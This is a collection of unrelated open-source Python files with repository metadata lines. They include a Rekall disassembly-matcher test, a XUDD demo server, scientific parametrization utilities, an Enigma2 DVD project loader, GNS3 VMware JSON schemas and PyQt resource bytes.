f.write(response.content)
| engineerapart/TheRemoteFreelancer | docs/scripts/download_favicons.py | Python | unlicense | 964 |
from builtins import object
import binascii
import mock
from rekall import testlib
from rekall.plugins.tools import dynamic_profiles
class MockAddressResolver(object):
def __init__(self, name_map):
self.name_map = name_map
def format_address(self, address):
if address == None:
return ""
return self.name_map.get(address, "")
class TestDynamicProfile(testlib.RekallBaseUnitTestCase):
"""Tests the dynamic profile mechanism."""
TEST_CASES = [
dict(
expected={"$out": 0x20},
mode="AMD64",
# Taken from Windows 7 x64
offset=0xf800029eb5d0,
data=('48895c240848896c24104889742418574883ec2033ff418bf08bea488bd'
'948393975218d572833c941b848546162e80d4602004889034885c07504'
'32c0eb49bf01000000488b1b33d2448d4228488bcbe86b27efff83630c0'
'00bfe893bc7430880000000c743107f000000896b04e80583e9ff4885c0'
'750a488bcbe8f0feffffebb948894320b001488b5c2430'),
example="""
0xf800029eb63e 0x6e e80583e9ff call 0xf80002883948 nt!RtlpAllocateSecondLevelDir
0xf800029eb643 0x73 4885c0 test rax, rax
0xf800029eb646 0x76 750a jne 0xf800029eb652 nt!RtlCreateHashTable+0x82
0xf800029eb648 0x78 488bcb mov rcx, rbx
0xf800029eb64b 0x7b e8f0feffff call 0xf800029eb540 nt!RtlDeleteHashTable
0xf800029eb650 0x80 ebb9 jmp 0xf800029eb60b nt!RtlCreateHashTable+0x3b
0xf800029eb652 0x82 48894320 mov qword ptr [rbx + 0x20], rax
""",
rules=[
{'mnemonic': 'CALL',
'comment': 'nt!RtlpAllocateSecondLevelDir'},
{'mnemonic': 'MOV',
'operands': [{'disp': "$out", 'base': '$rbx'},
{'type': 'REG', 'reg': 'RAX'}]},
],
# Used to pre-seed the address resolver with symbol names for
# testing.
name_map={
0xf80002883948: ["nt!RtlpAllocateSecondLevelDir"],
},
),
# Example from MiSessionInsertImage()
# http://gate.upm.ro/os/LABs/Windows_OS_Internals_Curriculum_Resource_Kit-ACADEMIC/WindowsResearchKernel-WRK/WRK-v1.2/base/ntos/mm/sessload.c
dict(
# Taken from Windows 8 x64 dis "nt!MiSessionInsertImage"
offset=0xf801ea55f680,
data=('48895c240848896c2410488974241857415641574883ec20498bf0488bea'
'488bf941be5000000041b84d6d4869b900020000418bd6e856091200488b'
'd84885c00f84fee60900458bc633d2488bc8e89d03f3ffc7433001000000'
'4883cf0348897b20654c8b342588010000498b86b8000000488b88f00300'
'008b41084c8db9f80b0000488d7968498bd7498bce48896b38894334e8ef'
'16f7ff4c8b1f4c3bdf'),
rules=[
{'mnemonic': 'MOV', 'operands': [
{'type': 'REG', 'reg': '$RDI'},
{'type': 'REG', 'reg': 'RCX'}]},
{'mnemonic': 'CALL',
'comment': 'nt!ExAllocatePoolWithTag'},
{'mnemonic': 'MOV', 'operands': [
{'type': 'REG', 'reg': '$RBX'},
{'type': 'REG', 'reg': 'RAX'}]},
# RtlZeroMemory (NewImage, sizeof(IMAGE_ENTRY_IN_SESSION));
{'mnemonic': 'CALL', 'comment': 'nt!memset'},
# NewImage->ImageCountInThisSession = 1;
{'mnemonic': 'MOV', 'operands': [
{'disp': "$ImageCountInThisSession",
'base': '$RBX', 'type': 'MEM'},
{'address': 1, 'type': 'IMM'}]},
# NewImage->Address = BaseAddress;
{'mnemonic': 'MOV', 'operands': [
{'disp': "$Address",
'base': '$RBX', 'type': 'MEM'},
{'type': 'REG', 'reg': '$RDI'}]},
],
name_map={
0xf801ea680010: ["nt!ExAllocatePoolWithTag"],
0xf801ea48fa70: ["nt!memset"],
},
expected={"$Address": 0x20, "$ImageCountInThisSession": 0x30},
),
]
def testDynamicProfile(self):
for case in self.TEST_CASES:
self.session = mock.Mock(
wraps=self.MakeUserSession(),
address_resolver=MockAddressResolver(
case.get("name_map", {}))
)
matcher = dynamic_profiles.DisassembleMatcher(
mode=case.get("mode", "AMD64"),
rules=case["rules"],
session=self.session)
match = matcher.Match(offset=case.get("offset", 0),
data=binascii.unhexlify(case["data"]))
for k, v in case["expected"].items():
self.assertEqual(match[k], v)
| google/rekall | rekall-core/rekall/plugins/tools/dynamic_profiles_test.py | Python | gpl-2.0 | 5,057 |
from xudd.lib.server import Server
from xudd.lib.http import HTTP
from xudd.lib.wsgi import WSGI
from xudd.hive import Hive
import logging
def wsgi_app(environ, start_response):
response = start_response(200, {'Content-Type': 'text/plain'}.items())
response('Hello World!')
def serve():
logging.basicConfig(level=logging.DEBUG)
logging.getLogger('xudd.hive').setLevel(logging.INFO)
logging.getLogger('xudd.actor').setLevel(logging.INFO)
hive = Hive()
wsgi_id = hive.create_actor(WSGI, app=wsgi_app)
http_id = hive.create_actor(HTTP, request_handler=wsgi_id)
server_id = hive.create_actor(Server, request_handler=http_id)
hive.send_message(
to=server_id,
directive='listen')
hive.run()
if __name__ == '__main__':
serve()
| xudd/xudd | xudd/demos/lib-server.py | Python | apache-2.0 | 795 |
from models import Job
from interface import get_all_jobs
def running_jobs(request):
if request.user.is_authenticated():
# hack to get numbers to update
get_all_jobs(request.user.credentials.all())
temp = len(Job.get_running_jobs(user=request.user))
return {"running_jobs": temp}
else:
return {"running_jobs": None}
| crcollins/chemtools-webapp | cluster/context_processors.py | Python | mit | 366 |
from hotbit.parametrization import KSAllElectron
import numpy as np
from box import mix
from box.interpolation import Function
from hotbit.io.fortran import fortran_readline
integrals =['dds','ddp','ddd','pds','pdp','pps','ppp','sds','sps','sss']
def plot_table(parfile,screen=False,s1=None,s2=None,der=0):
""" Plot table. """
import pylab as pl
if s1==None or s2==None:
s1,s2=parfile.split('.')[0].split('_')
if s1==s2:
nel=1
pairs=[(s1,s2)]
else:
nel=2
pairs=[(s1,s2),(s2,s1)]
pl.rc('figure.subplot',wspace=0.0001)
pl.rc('figure.subplot',hspace=0.0001)
rgrid, tables=read_table(parfile,s1,s2)
mx=max( tables[0].flatten() )
for i in range(10):
name=integrals[i]
ax=pl.subplot(5,2,i+1)
for p,(e1,e2) in enumerate(pairs):
if p==1: s='--'
else: s='-'
if der==0:
grid=rgrid
H=tables[p][:,i]
S=tables[p][:,i+10]
elif der==1:
grid=np.linspace(rgrid[0],rgrid[-1],3*len(rgrid))
hf=Function('spline',rgrid,tables[p][:,i])
sf=Function('spline',rgrid,tables[p][:,i+10])
H=np.array([hf(r,der=1) for r in grid])
S=np.array([sf(r,der=1) for r in grid])
pl.plot(grid,H,c='r',ls=s,label='%s%s: H' %(e1,e2))
pl.plot(grid,S,c='b',ls=s,label='%s%s: S' %(e1,e2))
pl.axhline(c='k',ls='--')
pl.title(name,position=(0.9,0.8))
if ax.is_last_row():
pl.xlabel('r (Bohr)')
else:
pl.xticks([],[])
if not ax.is_first_col():
pl.yticks([],[])
pl.ylim(-mx,mx)
pl.xlim(0)
pl.legend(loc='upper left')
if screen:
pl.show()
else:
name='%s_%s_par.png' %(s1,s2)
if der==1:
name='der_'+name
pl.savefig(name)
def compare_tables(parfile1,parfile2,s1=None,s2=None,screen=False):
""" Plot table. """
import pylab as pl
pl.rcParams.update({'legend.fontsize': 5,'legend.linewidth': 0})
if s1==None or s2==None:
s1,s2=parfile1.split('.')[0].split('_')
if s1==s2:
nel=1
pairs=[(s1,s2)]
else:
nel=2
pairs=[(s1,s2),(s2,s1)]
pl.rc('figure.subplot',wspace=0.0001)
pl.rc('figure.subplot',hspace=0.0001)
rgrid1, tables1=read_table(parfile1,s1,s2)
rgrid2, tables2=read_table(parfile2,s1,s2)
mx=max( tables1[0].flatten() )*0.5
for i in range(10):
name=integrals[i]
ax=pl.subplot(5,2,i+1)
for p,(e1,e2) in enumerate(pairs):
if p==1: s='--'
else: s='-'
# first table
pl.plot(rgrid1,tables1[p][:,i],lw=5,c='r',alpha=0.3,ls=s,label='%s%s: H (%s)' %(e1,e2,parfile1))
pl.plot(rgrid1,tables1[p][:,i+10],lw=5,alpha=0.3,c='b',ls=s,label='%s%s: S' %(e1,e2))
# second table
pl.plot(rgrid2,tables2[p][:,i],lw=2,c='r',ls=s,label='%s%s: H (%s)' %(e1,e2,parfile2))
pl.plot(rgrid2,tables2[p][:,i+10],lw=2,c='b',ls=s,label='%s%s: S' %(e1,e2))
pl.axhline(c='k',ls='--')
pl.title(name,position=(0.9,0.8))
if ax.is_last_row():
pl.xlabel('r (Bohr)')
else:
pl.xticks([],[])
if not ax.is_first_col():
pl.yticks([],[])
if ax.is_first_col() and ax.is_first_row():
pl.legend()
pl.ylim(-mx,mx)
pl.xlim(0)
if screen:
pl.show()
else:
pl.savefig('%s_%s_comparison.png' %(s1,s2))
pl.close()
def read_table(parfile,s1,s2):
""" Read parameter table from file parfile for elements with symbols s1 and s2.
return list of tables [s1_s2_table,s2_s1_table] (or only other if s1==s2)
"""
if parfile.find('.skf')>0:
if not parfile!='%s%s.skf':
raise NotImplementedError('Comparison assumes filename of type symbol1symbol2.skf.')
rgrid, table12 = read_skf_table('%s%s.skf' %(s1,s2),s1,s2)
rgrid, table21 = read_skf_table('%s%s.skf' %(s2,s1),s2,s1)
table = [table12]
if s1!=s2:
table.append(table21)
else:
f=open(parfile)
nel=[1,2][s1==s2]
tab=mix.find_value(parfile,'%s_%s_table' %(s1,s2),fmt='matrix')
rgrid=tab[:,0]
table=[tab[:,1:]]
if s1!=s2:
tab=mix.find_value(parfile,'%s_%s_table' %(s2,s1),fmt='matrix')
table.append(tab[:,1:])
f.close()
return rgrid, table
def read_skf_table(parfile,s1,s2):
""" Read SlaKo tables from .skf parameter file for elements with symbols s1,s2."""
f=open(parfile)
dx,n = fortran_readline(f)
dx,n = float(dx), int(n)
f.readline()
if s1==s2: #additional line in homonuclear table
f.readline()
table = []
for i in range(n):
line = fortran_readline( f.readline() )
if len(line)>0:
table += [line]
return dx*np.arange(0,n-1), np.array(table)
def tail_smoothening(x,y):
""" For given grid-function y(x), make smooth tail.
Aim is to get (e.g. for Slater-Koster tables and repulsions) smoothly
behaving energies and forces near cutoff region.
Make is such that y and y' go smoothly exactly to zero at last point.
Method: take largest neighboring points y_k and y_(k+1) (k<N-3) such
that line through them passes zero below x_(N-1). Then fit
third-order polynomial through points y_k, y_k+1 and y_N-1.
Return:
smoothed y-function on same grid.
"""
if np.all(abs(y)<1E-10):
return y
N=len(x)
xmax=x[-1]
for i in range(N-3,1,-1):
x0i=x[i]-y[i]/( (y[i+1]-y[i])/(x[i+1]-x[i]) )
if x0i<xmax:
k=i
break
if k<N/4:
for i in range(N):
print(x[i],y[i])
raise RuntimeError('Problem with tail smoothening: requires too large tail.')
if k==N-3:
y[-1]=0.0
return y
else:
# g(x)=c2*(xmax-x)**m + c3*(xmax-x)**(m+1) goes through (xk,yk),(xk+1,yk+1) and (xmax,0)
# Try different m if g(x) should change sign (this we do not want)
sgn=np.sign(y[k])
for m in range(2,10):
a1, a2=(xmax-x[k])**m, (xmax-x[k])**(m+1)
b1, b2=(xmax-x[k+1])**m, (xmax-x[k+1])**(m+1)
c3=(y[k]-a1*y[k+1]/b1)/(a2-a1*b2/b1)
c2=(y[k]-a2*c3)/a1
for i in range(k+2,N):
y[i]=c2*(xmax-x[i])**2 + c3*(xmax-x[i])**3
y[-1]=0.0 #once more excplicitly
if np.all(y[k:]*sgn>=0):
break
if m==9:
raise RuntimeError('Problems with function smoothening; need for new algorithm?')
return y
def IP_EA(symb,remove_orb,add_orb,remove,add,add_args={}):
""" Return ionization potential and electron affinity for given atom,
and the valence energies of neutral atom.
parameters:
-----------
symb: element symbol
remove_orb: orbital from where to remove atoms (e.g. '2p')
add_orb: orbital from where to add atoms (e.g. '2p')
remove: how many electrons to remove
add: how many electrons to add
(remove and add can be different from 1.0 if DFT should not
be stable to e.g. adding one full electron)
Fit second order curve for 3 points and return IP and EA for full
electron adding and removal.
"""
#from box.data import atom_occupations
atom = KSAllElectron(symb, txt='-', **add_args)
# add electrons -> negative ion
#occu=atom_occupations[symb].copy()
w = 'negative.atom'
occu_add = atom.occu.copy()
occu_add[add_orb] += add
ea = KSAllElectron(symb, configuration=occu_add, restart=w, write=w,
**add_args)
ea.run()
# neutral atom
w = 'neutral.atom'
neutral = KSAllElectron(symb, restart=w, write=w, **add_args)
neutral.run()
valence_energies = neutral.get_valence_energies()
# remove electrons -> positive ion
#occu=atom_occupations[symb].copy()
w = 'positive.atom'
occu_remove = atom.occu.copy()
occu_remove[remove_orb] -= remove
ip = KSAllElectron(symb, configuration=occu_remove, restart=w, write=w,
**add_args)
ip.run()
e0 = neutral.get_energy()
en = ea.get_energy()-e0
ep = ip.get_energy()-e0
# e(x)=e0+c1*x+c2*x**2 =energy as a function of additional electrons
c2 = (en+ep*add/remove)/(add*(remove+add))
c1 = (c2*remove**2-ep)/remove
IP = -c1+c2
EA = -(c1+c2)
return IP, EA, neutral
def ionization_potential(symb,remove,electrons=1.0):
""" Return ionization potential of given atom.
parameters:
-----------
symb: element symbol
remove: orbital from where electron is removed (e.g. '2p')
electrons: how many electrons to remove. Can be fractional number
if DFT should not be stable. IP is scaled by
electrons^-1 in the end to extrapolate to electrons=1.
"""
from box.data import atom_occupations
occu=atom_occupations[symb].copy()
# neutral atom
atom=KSAllElectron(symb)
atom.run()
e0=atom.get_energy()
# negative ion
occu[remove]-=electrons
ion=KSAllElectron(symb,occu=occu)
ion.run()
e1=ion.get_energy()
return (e1-e0)/electrons
def electron_affinity(symb,add,electrons=1.0):
""" Return electron affinity of given atom.
parameters:
-----------
symb: element symbol
add: orbital where electron is added (e.g. '2p')
electrons: how many electrons are added. Can be fractional number
if DFT should not be stable. EA is scaled by
electrons^-1 in the end to extrapolate to electrons=1.
"""
from box.data import atom_occupations
occu=atom_occupations[symb].copy()
# neutral atom
atom=KSAllElectron(symb)
atom.run()
e0=atom.get_energy()
# positive ion
occu[add]+=electrons
ion=KSAllElectron(symb,occu=occu)
ion.run()
e1=ion.get_energy()
return (e0-e1)/electrons
if __name__=='__main__':
#plot_table('Au_Au.par',s1='Au',s2='Au',screen=True,der=0)
#compare_tables('Au_Au.par','Au_Au_NR.par',s1='Au',s2='Au',screen=False)
x=np.array([1,2,3,4,5,6,7,8,9,10])
y=np.array([100,70,30,10,5,2,0.5,0.1,0.05,0.0001])
pl.plot(x,y)
y=tail_smoothening(x,y)
pl.plot(x,y)
pl.show()
| pekkosk/hotbit | hotbit/parametrization/util.py | Python | gpl-2.0 | 10,616 |
from Tools.Directories import fileExists
from Components.config import config, ConfigSubsection, ConfigInteger, ConfigText, ConfigSelection, getConfigListEntry, ConfigSequence, ConfigSubList
import DVDTitle
import xml.dom.minidom
from Tools.Directories import resolveFilename, SCOPE_PLUGINS, SCOPE_FONTS
class ConfigColor(ConfigSequence):
def __init__(self, default = [128,128,128]):
ConfigSequence.__init__(self, seperator = "#", limits = [(0,255),(0,255),(0,255)], default = default)
class ConfigFilename(ConfigText):
def __init__(self):
ConfigText.__init__(self, default = "", fixed_size = True, visible_width = False)
def getMulti(self, selected):
if self.text == "":
return ("mtext"[1-selected:], "", 0)
cut_len = min(len(self.text),40)
filename = (self.text.rstrip("/").rsplit("/",1))[1].encode("utf-8")[:cut_len] + " "
if self.allmarked:
mark = range(0, len(filename))
else:
mark = [filename]
return ("mtext"[1-selected:], filename, mark)
class DVDProject:
MAX_SL = 4480
MAX_DL = 8150
def __init__(self):
self.titles = [ ]
self.target = None
self.settings = ConfigSubsection()
self.settings.name = ConfigText(fixed_size = False, visible_width = 40)
self.settings.authormode = ConfigSelection(choices = [("menu_linked", _("Linked titles with a DVD menu")), ("just_linked", _("Direct playback of linked titles without menu")), ("menu_seperate", _("Seperate titles with a main menu")), ("data_ts", _("Box format data DVD (HDTV compatible)"))])
self.settings.titlesetmode = ConfigSelection(choices = [("single", _("Simple titleset (compatibility for legacy players)")), ("multi", _("Complex (allows mixing audio tracks and aspects)"))], default="multi")
self.settings.output = ConfigSelection(choices = [("iso", _("Create DVD-ISO")), ("dvd", _("Burn DVD"))])
self.settings.isopath = ConfigText(fixed_size = False, visible_width = 40)
self.settings.dataformat = ConfigSelection(choices = [("iso9660_1", ("ISO9660 Level 1")), ("iso9660_4", ("ISO9660 version 2")), ("udf", ("UDF"))])
self.settings.menutemplate = ConfigFilename()
self.settings.vmgm = ConfigFilename()
self.filekeys = ["vmgm", "isopath", "menutemplate"]
self.menutemplate = MenuTemplate()
self.error = ""
self.session = None
def addService(self, service):
title = DVDTitle.DVDTitle(self)
title.addService(service)
self.titles.append(title)
return title
def saveProject(self, path):
from Tools.XMLTools import stringToXML
list = []
list.append('<?xml version="1.0" encoding="utf-8" ?>\n')
list.append('<DreamDVDBurnerProject>\n')
list.append('\t<settings ')
for key, val in self.settings.dict().iteritems():
list.append( key + '="' + str(val.getValue()) + '" ' )
list.append('/>\n')
list.append('\t<titles>\n')
for title in self.titles:
list.append('\t\t<title>\n')
list.append('\t\t\t<path>')
list.append(stringToXML(title.source.getPath()))
list.append('</path>\n')
list.append('\t\t\t<properties ')
audiotracks = []
for key, val in title.properties.dict().iteritems():
if type(val) is ConfigSubList:
audiotracks.append('\t\t\t<audiotracks>\n')
for audiotrack in val:
audiotracks.append('\t\t\t\t<audiotrack ')
for subkey, subval in audiotrack.dict().iteritems():
audiotracks.append( subkey + '="' + str(subval.getValue()) + '" ' )
audiotracks.append(' />\n')
audiotracks.append('\t\t\t</audiotracks>\n')
else:
list.append( key + '="' + str(val.getValue()) + '" ' )
list.append('/>\n')
for line in audiotracks:
list.append(line)
list.append('\t\t</title>\n')
list.append('\t</titles>\n')
list.append('</DreamDVDBurnerProject>\n')
name = self.settings.name.getValue()
i = 0
filename = path + name + ".ddvdp.xml"
while fileExists(filename):
i = i+1
filename = path + name + str(i).zfill(3) + ".ddvdp.xml"
try:
file = open(filename, "w")
for x in list:
file.write(x)
file.close()
except:
return False
return filename
def load(self, filename):
ret = self.loadProject(filename)
if ret:
ret = self.menutemplate.loadTemplate(self.settings.menutemplate.getValue())
self.error += self.menutemplate.error
return ret
def loadProject(self, filename):
#try:
if not fileExists(filename):
self.error = "xml file not found!"
#raise AttributeError
file = open(filename, "r")
data = file.read().decode("utf-8").replace('&',"&").encode("ascii",'xmlcharrefreplace')
file.close()
projectfiledom = xml.dom.minidom.parseString(data)
for node in projectfiledom.childNodes[0].childNodes:
print "node:", node
if node.nodeType == xml.dom.minidom.Element.nodeType:
if node.tagName == 'settings':
self.xmlAttributesToConfig(node, self.settings)
elif node.tagName == 'titles':
self.xmlGetTitleNodeRecursive(node)
for key in self.filekeys:
val = self.settings.dict()[key].getValue()
if not fileExists(val):
if val[0] != "/":
if key.find("font") == 0:
val = resolveFilename(SCOPE_FONTS)+val
else:
val = resolveFilename(SCOPE_PLUGINS)+"Extensions/DVDBurn/"+val
if fileExists(val):
self.settings.dict()[key].setValue(val)
continue
self.error += "\n%s '%s' not found" % (key, val)
#except AttributeError:
#print "loadProject AttributeError", self.error
#self.error += (" in project '%s'") % (filename)
#return False
return True
def xmlAttributesToConfig(self, node, config):
try:
i = 0
#if node.attributes.length < len(config.dict())-1:
#self.error = "project attributes missing"
#raise AttributeError
while i < node.attributes.length:
item = node.attributes.item(i)
key = item.name.encode("utf-8")
try:
val = eval(item.nodeValue)
except (NameError, SyntaxError):
val = item.nodeValue.encode("utf-8")
try:
print "config[%s].setValue(%s)" % (key, val)
config.dict()[key].setValue(val)
except (KeyError):
self.error = "unknown attribute '%s'" % (key)
print "KeyError", self.error
raise AttributeError
i += 1
except AttributeError:
self.error += (" XML attribute error '%s'") % node.toxml()
return False
def xmlGetTitleNodeRecursive(self, node, title_idx = -1):
print "[xmlGetTitleNodeRecursive]", title_idx, node
print node.childNodes
for subnode in node.childNodes:
print "xmlGetTitleNodeRecursive subnode:", subnode
if subnode.nodeType == xml.dom.minidom.Element.nodeType:
if subnode.tagName == 'title':
title_idx += 1
title = DVDTitle.DVDTitle(self)
self.titles.append(title)
self.xmlGetTitleNodeRecursive(subnode, title_idx)
if subnode.tagName == 'path':
print "path:", subnode.firstChild.data
filename = subnode.firstChild.data
self.titles[title_idx].addFile(filename.encode("utf-8"))
if subnode.tagName == 'properties':
self.xmlAttributesToConfig(node, self.titles[title_idx].properties)
if subnode.tagName == 'audiotracks':
self.xmlGetTitleNodeRecursive(subnode, title_idx)
if subnode.tagName == 'audiotrack':
print "audiotrack...", subnode.toxml()
def getSize(self):
totalsize = 0
for title in self.titles:
totalsize += title.estimatedDiskspace
return totalsize
size = property(getSize)
class MenuTemplate(DVDProject):
def __init__(self):
self.settings = ConfigSubsection()
self.settings.titleformat = ConfigText(fixed_size = False, visible_width = 40)
self.settings.subtitleformat = ConfigText(fixed_size = False, visible_width = 40)
self.settings.menubg = ConfigFilename()
self.settings.menuaudio = ConfigFilename()
self.settings.dimensions = ConfigSequence(seperator = ',', default = [576,720], limits = [(352,720),(480,576)])
self.settings.rows = ConfigInteger(default = 4, limits = (1, 10))
self.settings.cols = ConfigInteger(default = 1, limits = (1, 4))
self.settings.color_headline = ConfigColor()
self.settings.color_headline = ConfigColor()
self.settings.color_highlight = ConfigColor()
self.settings.color_button = ConfigColor()
self.settings.fontface_headline = ConfigFilename()
self.settings.fontface_title = ConfigFilename()
self.settings.fontface_subtitle = ConfigFilename()
self.settings.fontsize_headline = ConfigInteger(default = 46, limits = (0, 199))
self.settings.fontsize_title = ConfigInteger(default = 24, limits = (0, 199))
self.settings.fontsize_subtitle = ConfigInteger(default = 14, limits = (0, 199))
self.settings.margin_top = ConfigInteger(default = 120, limits = (0, 500))
self.settings.margin_bottom = ConfigInteger(default = 40, limits = (0, 500))
self.settings.margin_left = ConfigInteger(default = 56, limits = (0, 500))
self.settings.margin_right = ConfigInteger(default = 56, limits = (0, 500))
self.settings.space_rows = ConfigInteger(default = 32, limits = (0, 500))
self.settings.space_cols = ConfigInteger(default = 24, limits = (0, 500))
self.settings.prev_page_text = ConfigText(default = "<<<", fixed_size = False)
self.settings.next_page_text = ConfigText(default = ">>>", fixed_size = False)
self.settings.offset_headline = ConfigSequence(seperator = ',', default = [0,0], limits = [(-1,500),(-1,500)])
self.settings.offset_title = ConfigSequence(seperator = ',', default = [0,0], limits = [(-1,500),(-1,500)])
self.settings.offset_subtitle = ConfigSequence(seperator = ',', default = [20,0], limits = [(-1,500),(-1,500)])
self.settings.offset_thumb = ConfigSequence(seperator = ',', default = [40,0], limits = [(-1,500),(-1,500)])
self.settings.thumb_size = ConfigSequence(seperator = ',', default = [200,158], limits = [(0,576),(-1,720)])
self.settings.thumb_border = ConfigInteger(default = 2, limits = (0, 20))
self.filekeys = ["menubg", "menuaudio", "fontface_headline", "fontface_title", "fontface_subtitle"]
from TitleProperties import languageChoices
self.settings.menulang = ConfigSelection(choices = languageChoices.choices, default=languageChoices.choices[1][0])
self.error = ""
def loadTemplate(self, filename):
ret = DVDProject.loadProject(self, filename)
DVDProject.error = self.error
return ret
| openpli-arm/enigma2-arm | lib/python/Plugins/Extensions/DVDBurn/DVDProject.py | Python | gpl-2.0 | 10,154 |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2014 GNS3 Technologies Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from .custom_adapters import CUSTOM_ADAPTERS_ARRAY_SCHEMA
VMWARE_CREATE_SCHEMA = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "Request validation to create a new VMware VM instance",
"type": "object",
"properties": {
"node_id": {
"description": "Node UUID",
"type": "string",
"minLength": 36,
"maxLength": 36,
"pattern": "^[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}$"
},
"linked_clone": {
"description": "Whether the VM is a linked clone or not",
"type": "boolean"
},
"name": {
"description": "VMware VM instance name",
"type": "string",
"minLength": 1,
},
"usage": {
"description": "How to use the VMware VM",
"type": "string",
},
"vmx_path": {
"description": "Path to the vmx file",
"type": "string",
"minLength": 1,
},
"console": {
"description": "Console TCP port",
"minimum": 1,
"maximum": 65535,
"type": ["integer", "null"]
},
"console_type": {
"description": "Console type",
"enum": ["telnet", "none"]
},
"headless": {
"description": "Headless mode",
"type": "boolean"
},
"on_close": {
"description": "Action to execute on the VM is closed",
"enum": ["power_off", "shutdown_signal", "save_vm_state"],
},
"adapters": {
"description": "Number of adapters",
"type": "integer",
"minimum": 0,
"maximum": 10, # maximum adapters support by VMware VMs
},
"adapter_type": {
"description": "VMware adapter type",
"type": "string",
"minLength": 1,
},
"use_any_adapter": {
"description": "Allow GNS3 to use any VMware adapter",
"type": "boolean",
},
"custom_adapters": CUSTOM_ADAPTERS_ARRAY_SCHEMA
},
"additionalProperties": False,
"required": ["name", "vmx_path", "linked_clone"],
}
VMWARE_OBJECT_SCHEMA = {
"$schema": "http://json-schema.org/draft-04/schema#",
"description": "VMware VM instance",
"type": "object",
"properties": {
"name": {
"description": "VMware VM instance name",
"type": "string",
"minLength": 1,
},
"usage": {
"description": "How to use the VMware VM",
"type": "string",
},
"node_id": {
"description": "Node UUID",
"type": "string",
"minLength": 36,
"maxLength": 36,
"pattern": "^[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}$"
},
"status": {
"description": "VM status",
"enum": ["started", "stopped", "suspended"]
},
"node_directory": {
"description": "Path to the node working directory",
"type": ["string", "null"]
},
"project_id": {
"description": "Project UUID",
"type": "string",
"minLength": 36,
"maxLength": 36,
"pattern": "^[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}$"
},
"vmx_path": {
"description": "Path to the vmx file",
"type": "string",
"minLength": 1,
},
"headless": {
"description": "Headless mode",
"type": "boolean"
},
"on_close": {
"description": "Action to execute on the VM is closed",
"enum": ["power_off", "shutdown_signal", "save_vm_state"],
},
"adapters": {
"description": "Number of adapters",
"type": "integer",
"minimum": 0,
"maximum": 10, # maximum adapters support by VMware VMs
},
"adapter_type": {
"description": "VMware adapter type",
"type": "string",
"minLength": 1,
},
"use_any_adapter": {
"description": "Allow GNS3 to use any VMware adapter",
"type": "boolean",
},
"console": {
"description": "Console TCP port",
"minimum": 1,
"maximum": 65535,
"type": ["integer", "null"]
},
"console_type": {
"description": "Console type",
"enum": ["telnet", "none"]
},
"linked_clone": {
"description": "Whether the VM is a linked clone or not",
"type": "boolean"
},
"custom_adapters": CUSTOM_ADAPTERS_ARRAY_SCHEMA
},
"additionalProperties": False
}
| GNS3/gns3-server | gns3server/schemas/vmware.py | Python | gpl-3.0 | 5,652 |
# -*- coding: utf-8 -*-
# Resource object code
#
# Created: qui mar 3 18:02:04 2016
# by: The Resource Compiler for PyQt (Qt v4.8.6)
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore
qt_resource_data = "\
\x00\x00\x02\xd5\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x11\x00\x00\x00\x17\x08\x06\x00\x00\x00\xed\x34\xa4\xe7\
\x00\x00\x00\x06\x62\x4b\x47\x44\x00\xff\x00\xff\x00\xff\xa0\xbd\
\xa7\x93\x00\x00\x00\x09\x70\x48\x59\x73\x00\x00\x0b\x13\x00\x00\
\x0b\x13\x01\x00\x9a\x9c\x18\x00\x00\x00\x07\x74\x49\x4d\x45\x07\
\xe0\x02\x0c\x13\x33\x03\x99\x84\x74\x59\x00\x00\x02\x62\x49\x44\
\x41\x54\x38\xcb\xcd\x93\x4d\x48\x54\x51\x14\xc7\xff\xe7\xbe\xfb\
\xde\x1b\x47\xc9\xb4\x0f\x21\x31\xed\x83\x24\xa4\x19\xfa\xc2\xbe\
\xa0\xa4\xa0\x5a\x34\x16\x04\x11\xa9\x10\x6d\x82\x5c\x38\x83\x85\
\x20\x25\x85\xb9\x31\xb2\x82\x5a\x08\x85\xf4\x61\x31\x11\x62\xd8\
\xaa\xb4\x76\xb5\x90\x28\xa5\x4d\x64\x68\xb6\x09\x2c\x21\x22\xeb\
\xbd\x7b\xef\x69\x31\x66\x8e\x8e\x83\xba\xea\xac\xce\xbd\x87\xfb\
\xbb\xf7\x7f\xce\xff\x12\xa6\x44\xe8\xfc\x1d\xf4\x35\x54\x62\x43\
\x73\x47\x90\x84\xb8\x2c\x88\xf6\x69\x63\xda\x8c\x51\x4d\x6f\xce\
\x1c\xf6\xc2\x17\xef\xe3\x6d\xfd\xd1\xa4\x33\x22\xdc\xd8\x9e\xb4\
\xd1\xd7\x50\x99\x28\x48\x3b\x62\x07\x02\xa5\x65\x6b\xf2\x77\x48\
\x37\x78\xc4\x92\xee\xfe\xb5\xd1\x16\x77\x2a\x20\xd4\xd8\x0e\x02\
\x80\xf0\x85\xbb\x39\x24\xe5\x3a\x10\x09\x90\x95\x2b\x1c\xa7\x9c\
\x2c\xe7\x18\x84\xf0\x58\x79\xaf\xc9\x76\x36\x43\x6b\x9b\x8d\x7a\
\xce\x9e\xdf\xc6\xc6\x1f\x86\x81\xd1\xda\xef\xef\x3f\x57\x31\x4a\
\xeb\x9b\x3b\x42\xd2\x71\x1f\xd8\xd2\xd2\x9e\x46\x31\x03\x36\x84\
\x00\x11\x25\xae\x62\x00\xe3\x29\x98\xc1\x6c\x40\x0c\x76\x2d\xea\
\xf3\x94\xb2\xb5\xf7\xbb\x42\xda\x6e\xe0\x66\x30\x23\x10\x2f\x5b\
